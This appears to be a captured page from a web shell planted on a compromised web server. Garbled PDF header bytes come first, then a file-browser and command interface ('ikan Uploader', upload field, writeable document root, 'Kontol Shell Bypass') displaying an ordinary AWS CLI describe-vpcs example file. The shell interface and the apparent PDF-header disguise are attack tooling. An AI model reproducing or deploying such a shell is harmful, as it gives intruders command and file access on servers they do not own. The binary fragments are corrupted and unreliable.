%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/ec2/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/ec2/describe-vpcs.rst
**Example 1: To describe all of your VPCs**

The following ``describe-vpcs`` example retrieves details about your VPCs. ::

    aws ec2 describe-vpcs

Output::

    {
        "Vpcs": [
            {
                "CidrBlock": "30.1.0.0/16",
                "DhcpOptionsId": "dopt-19edf471",
                "State": "available",
                "VpcId": "vpc-0e9801d129EXAMPLE",
                "OwnerId": "111122223333",
                "InstanceTenancy": "default",
                "CidrBlockAssociationSet": [
                    {
                        "AssociationId": "vpc-cidr-assoc-062c64cfafEXAMPLE",
                        "CidrBlock": "30.1.0.0/16",
                        "CidrBlockState": {
                            "State": "associated"
                        }
                    }
                ],
                "IsDefault": false,
                "Tags": [
                    {
                        "Key": "Name",
                        "Value": "Not Shared"
                    }
                ]
            },
            {
                "CidrBlock": "10.0.0.0/16",
                "DhcpOptionsId": "dopt-19edf471",
                "State": "available",
                "VpcId": "vpc-06e4ab6c6cEXAMPLE",
                "OwnerId": "222222222222",
                "InstanceTenancy": "default",
                "CidrBlockAssociationSet": [
                    {
                        "AssociationId": "vpc-cidr-assoc-00b17b4eddEXAMPLE",
                        "CidrBlock": "10.0.0.0/16",
                        "CidrBlockState": {
                            "State": "associated"
                        }
                    }
                ],
                "IsDefault": false,
                "Tags": [
                    {
                        "Key": "Name",
                        "Value": "Shared VPC"
                    }
                ]
            }
        ]
    }  

**Example 2: To describe a specified VPC**

The following ``describe-vpcs`` example retrieves details for the specified VPC. ::

    aws ec2 describe-vpcs \
        --vpc-ids vpc-06e4ab6c6cEXAMPLE

Output::

    {
        "Vpcs": [
            {
                "CidrBlock": "10.0.0.0/16",
                "DhcpOptionsId": "dopt-19edf471",
                "State": "available",
                "VpcId": "vpc-06e4ab6c6cEXAMPLE",
                "OwnerId": "111122223333",
                "InstanceTenancy": "default",
                "CidrBlockAssociationSet": [
                    {
                        "AssociationId": "vpc-cidr-assoc-00b17b4eddEXAMPLE",
                        "CidrBlock": "10.0.0.0/16",
                        "CidrBlockState": {
                            "State": "associated"
                        }
                    }
                ],
                "IsDefault": false,
                "Tags": [
                    {
                        "Key": "Name",
                        "Value": "Shared VPC"
                    }
                ]
            }
        ]
    }

Kontol Shell Bypass